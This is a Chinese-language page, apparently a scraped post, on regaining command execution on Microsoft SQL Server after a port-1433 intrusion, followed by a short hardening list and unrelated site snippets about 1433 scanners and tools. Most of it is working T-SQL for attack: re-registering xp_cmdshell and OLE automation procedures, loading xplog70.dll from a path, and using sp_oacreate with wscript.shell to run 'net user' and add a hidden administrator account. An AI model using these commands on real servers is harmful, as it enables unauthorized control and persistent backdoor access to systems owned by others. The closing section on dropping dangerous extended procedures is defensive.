恢复sp_addextendedproc语句:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
xp_cmdshell新的恢复办法(不用去管sp_addextendedproc是不是存在)
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1.未能找到存储过程'master..xpcmdshell'之解决方法:
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2.无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)
sp_dropextendedproc "xp_cmdshell"
sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3.无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:
127(找不到指定的程序。)
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
4.直接添加帐户法
删除odsole70.dll:
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
恢复odsole70.dll:
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
直接添加帐户命令:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe/c net localgroup administrators 用户名 /add'
5.恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
恢复cmdshell:exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在(返回结果为1就ok):
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
恢复xp_cmdshell(返回结果为1就ok):
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.
sysobjectswhere xtype='x' and name='xp_cmdshell'
否则上传xplog7.0.dll:
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
************************以下为防范时用**********************
1.删除所有危险扩展:
Drop PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
Drop PROCEDURE sp_addextendedproc
2.删除xp_cmdshell扩展:sp_dropextendedproc 'xp_cmdshell'
3.修补sa弱口令:exec sp_password NULL,'新密码','sa'
分享到:
相关推荐
4. **数据库维护**:包括数据库备份与恢复、索引重建、统计信息更新等常规维护任务,1433sqltools提供了便捷的自动化操作,减轻DBA的工作负担。 5. **性能监控**:实时监控数据库性能,如查询执行时间、内存使用...
总结来说,红尘网安1433强力极速版第七版是一款专注于SQL Server数据库安全的工具,旨在提供快速、强大的防护,确保企业或个人的数据安全。通过多种安全机制和性能优化,它可以帮助用户防范各种网络威胁,同时保持...
下面将对这些内容进行详细的解读和总结。 ### 1433弱口令扫描器 #### 知识点一:1433端口及其应用背景 - **端口号**:1433端口通常用于SQL Server服务。 - **服务类型**:SQL Server是一种关系型数据库管理系统,...
1433 SQL入侵恢复xp_cmdshell方法总结 sql server 2005下开启xp_cmdshell的办法 EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE; SQL2005开启’...
- 对于数据库操作,SQL Server的数据库恢复和备份,可以通过SQL Server Management Studio (SSMS) 来进行,包括备份数据库、事务日志等操作。 4. **解决页面乱码问题**: - JSP页面乱码通常涉及到字符编码设置。...
2. **SQL Server端口**:SQL Server默认监听的端口是1433。除此之外,还有其他端口可能被用于不同服务或功能,例如SQL Server Browser服务通常使用端口1434,但这些配置可以根据实际需求进行更改。 3. **Java项目...
- 配置防火墙以允许 TCP 1433 和 TCP 5022 端口通信。 - 为 AlwaysOn 准备登录名,通常使用域账户,并赋予 sysadmin 权限。 - 确保所有节点上的数据文件路径一致,并设置必要的共享文件夹。 - 对要加入可用性组...
总结,部署SQL Server的Always On 可用性组是一项涉及多方面的工作,包括硬件、软件配置、网络设置以及数据库管理和监控。理解并实施这些步骤和最佳实践,将有助于构建一个强大、可靠的高可用性数据库环境。
### 总结 以上列出的命令和配置主要涉及Linux操作系统的基本操作、数据库的备份与恢复、Java环境的配置以及数据库连接等方面的知识点。这些内容对于IT领域的开发者来说是非常实用的,可以帮助他们更好地管理和维护...
如果数据库被禁用或处于恢复状态,需要先将其启用或完成恢复过程。 8. **验证权限和认证模式**: 检查数据库的认证模式,确保它与连接尝试匹配。如果是Windows认证,确保使用正确的域账户;如果是SQL Server认证,...
**总结:** 本文档详细介绍了SQL Server的安装配置流程以及常用数据库操作,包括创建数据库、修改登录密码、备份恢复数据库、创建表及插入数据等基本操作。这些知识对于初学者来说是非常重要的基础,掌握了这些技能...
- **备份与恢复**:建议在进行任何重大更改前备份现有配置,以便在出现问题时能够迅速恢复。 #### 四、示例代码 以下是一个使用VBScript修改连接字符串以适应新端口的例子: ```vbscript Set oConn = Server....
总结来说,掌握JDBC连接数据库的技巧对于Java开发者至关重要,而良好的数据库设计原则和备份策略则是保障数据安全和系统稳定性的基石。理解并实践这些知识,将有助于提升数据库管理的专业水平。
在打开的TCP/IP属性窗口中,检查所有IP地址配置(如IP1, IPAll等)的“TCP端口”是否都设置为1433,这是SQL Server默认的TCP端口。 4. **保存设置**:完成设置后,点击“确定”保存更改,并关闭配置管理器。可能...
#### 五、总结 综上所述,“超强SA字典”作为一种专门针对SQL Server SA账户的密码字典,包含了大量的密码组合,旨在帮助安全专家和研究人员在合法授权的前提下进行渗透测试和安全审计工作。同时,也提醒广大用户...
总结,Java连接SQL Server 2000主要涉及以下知识点:JDBC驱动的类型和选择、驱动的添加与加载、数据库连接的建立、SQL语句的执行、事务管理以及性能优化。在实际开发中,理解这些概念并正确应用是确保应用程序能够...
- 服务器端配置:在SQL Server配置管理器中启用TCP/IP,设置IP地址和端口(默认1433)。 - 客户端配置:同样启用TCP/IP,并设置客户端IP地址和服务器端口。 - 创建别名:为方便访问,创建使用TCP/IP的服务器别名...
同时,要删除不必要且不安全的通讯协议,比如命名管道,并过滤IP地址,更改SQL Server TCP/IP的默认端口,避免常见的端口1433和1434,减少被黑客扫描和攻击的机会。 文件系统漏洞的改进主要涉及到选择适合安装SQL ...
- 隐藏SQL Server并更改默认的1433端口。 - **数据库增、删、查、改操作**: - 创建SQL Server登录账户,并赋予其相应表权限,测试其权限范围内的操作。 - 测试已离职员工后台账户的及时管理。 - 检查数据库日志...